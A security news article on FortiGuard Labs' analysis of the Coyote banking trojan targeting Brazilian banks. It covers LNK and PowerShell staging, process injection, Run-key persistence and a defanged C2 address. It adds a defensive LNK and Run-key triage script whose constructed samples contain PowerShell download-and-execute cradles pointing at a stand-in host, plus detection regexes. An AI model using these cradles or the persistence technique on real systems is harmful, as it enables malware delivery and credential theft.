
Source: FortiGuard Labs
Cybersecurity researchers at FortiGuard Labs have uncovered a stealthy and highly sophisticated banking trojan dubbed Coyote, which is actively targeting financial institutions and online banking users in Brazil.
This multi-stage attack leverages malicious LNK files and PowerShell scripts to infiltrate systems, deploy payloads, and steal sensitive banking credentials. Once installed, Coyote can keylog user activity, capture screenshots, display phishing overlays, and even manipulate browser windows to steal financial data.
The Coyote Banking Trojan is designed to harvest credentials from more than 70 financial applications and numerous online banking websites, making it one of the most sophisticated financial malware campaigns of 2024.
The attack begins with a weaponized LNK file that executes a hidden PowerShell command, connecting to a remote server and downloading additional payloads.
One of the observed commands used in this campaign:
The command fetches and executes further malicious scripts, initiating the next stage of the attack.
“The LNK file executes the following PowerShell command, which connects to a remote server to initiate the next stage.”
The LNK file is customized with a unique ‘Machine ID’, allowing attackers to track infections and correlate them with other compromised systems.
The malware collects:
✅ Machine ID & MAC Address
✅ Windows version & installed security software
✅ Running processes & active network connections
These details are sent to remote C2 servers, allowing attackers to assess which victims are worth further exploitation.
Once the victim’s system is identified as a worthy target, Coyote proceeds to download and execute additional payloads:
1️⃣ MSIL Loader (bmwiMcDec.dll)
- Injects the npuGDec payload into a target process using VirtualAllocEx and WriteProcessMemory.
- Starts the payload with CreateRemoteThread, the classic remote-thread injection triad that EDR products and Sysmon (Event ID 8) commonly flag.
2️⃣ Shellcode Loader
- Uses the Donut framework to decrypt and execute the final MSIL payload.
3️⃣ Persistence Mechanism
- Adds a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run so the chain survives a reboot.
- That value launches a PowerShell script which downloads the final Coyote Banking Trojan payload from: hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw
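The two host artifacts described above, the LNK that launches a hidden PowerShell download cradle and the Run-key value that re-downloads the final payload, can be triaged with the same heuristics. The following is an added example, not FortiGuard's code and not a campaign artifact: it builds a minimal ShellLink file (per the MS-SHLLINK layout) for a constructed benign shortcut and a constructed malicious one, parses the header and StringData back out, and flags download-cradle indicators in the LNK arguments and in constructed Run-key values. The domain cdn.example.invalid, the sample paths, the Run-key contents and the indicator regexes are all assumptions made for the example.

```python
"""Triage of a ShellLink (LNK) launcher and of Run-key values for the
hidden-PowerShell download-cradle pattern described in the article.
Added example: not FortiGuard's code, and no byte or string below is a
campaign artifact; the LNK samples and Run-key contents are constructed."""
import re
import struct

# MS-SHLLINK constants: the fixed LinkCLSID, the LinkFlags bits used here,
# and ShowCommand values (7 = SW_SHOWMINNOACTIVE, window never gets focus).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_RELATIVE_PATH, HAS_ARGUMENTS, IS_UNICODE = 0x08, 0x20, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7


def build_lnk(relative_path, arguments, show_command):
    """Build a minimal LNK: 76-byte ShellLinkHeader + two StringData items."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(text):  # CountCharacters (u16) + UTF-16LE characters
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data):
    """Return ShowCommand and the StringData fields of a LNK file."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & 0x01:  # HasLinkTargetIDList: IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:  # HasLinkInfo: LinkInfoSize (u32) covers the whole struct
        pos += struct.unpack_from("<I", data, pos)[0]
    # StringData items appear in this fixed order, each only if its flag is set.
    for name, bit in (("name", 0x04), ("relative_path", 0x08),
                      ("working_dir", 0x10), ("arguments", 0x20),
                      ("icon_location", 0x40)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields


# Indicators typical of a hidden PowerShell download cradle (heuristics
# chosen for this example, not a complete ruleset).
CRADLE_INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hid",
    "encoded_command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "no_profile": r"-nop\b",
    "policy_bypass": r"\bbypass\b",
    "invoke_expression": r"\biex\b|invoke-expression",
    "download_primitive": r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b",
    "remote_url": r"https?://",
}


def triage_command(command):
    """Names of the cradle indicators present in a command line."""
    return [name for name, pattern in CRADLE_INDICATORS.items()
            if re.search(pattern, command, re.IGNORECASE)]


def triage_lnk(data):
    """Indicators for a LNK: its arguments plus launcher and window checks."""
    f = parse_lnk(data)
    hits = triage_command(f.get("arguments", ""))
    if "powershell" in (f.get("relative_path", "") + f.get("arguments", "")).lower():
        hits.append("powershell_target")
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("start_minimized")
    return hits


def triage_run_values(values):
    """Run-key values (name -> command) that launch a PowerShell cradle.
    On a live host read them with winreg from HKCU\\...\\CurrentVersion\\Run."""
    return {name: triage_command(cmd) for name, cmd in values.items()
            if "powershell" in cmd.lower() and triage_command(cmd)}


# Constructed samples (assumptions, not campaign data): a benign shortcut,
# a hidden-PowerShell launcher, and two Run-key values.
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", "", SW_SHOWNORMAL)
CRADLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://cdn.example.invalid/stage2')\"",
    SW_SHOWMINNOACTIVE)
RUN_VALUES = {
    "OneDrive": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Updater": "powershell.exe -w hidden -c \"iwr https://cdn.example.invalid/final | iex\"",
}

if __name__ == "__main__":
    print("benign LNK:", triage_lnk(BENIGN_LNK))
    print("cradle LNK:", triage_lnk(CRADLE_LNK))
    print("Run key:", triage_run_values(RUN_VALUES))
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes, so it reaches the StringData on those files too. A ShowCommand of 7 combined with a powershell.exe target is a strong tell on its own, since a legitimate shortcut to a script rarely needs to start minimized without ever taking focus. For production triage, a full parser such as LECmd or the lnkparse library is the better choice; the point here is what fields matter and why.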
Once the Coyote Banking Trojan is deployed, it can perform various malicious activities, including:
- Keylogging: Recording keystrokes to capture sensitive information like usernames, passwords, and credit card details.
- Capturing screenshots: Taking screenshots of the victim’s screen to gather additional information.
- Displaying phishing overlays: Displaying fake login forms or other overlays to trick users into entering their credentials.
“This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files,” the FortiGuard Labs analysis states. The Coyote Banking Trojan poses a significant threat to users in Brazil, as it targets a wide range of financial institutions and websites.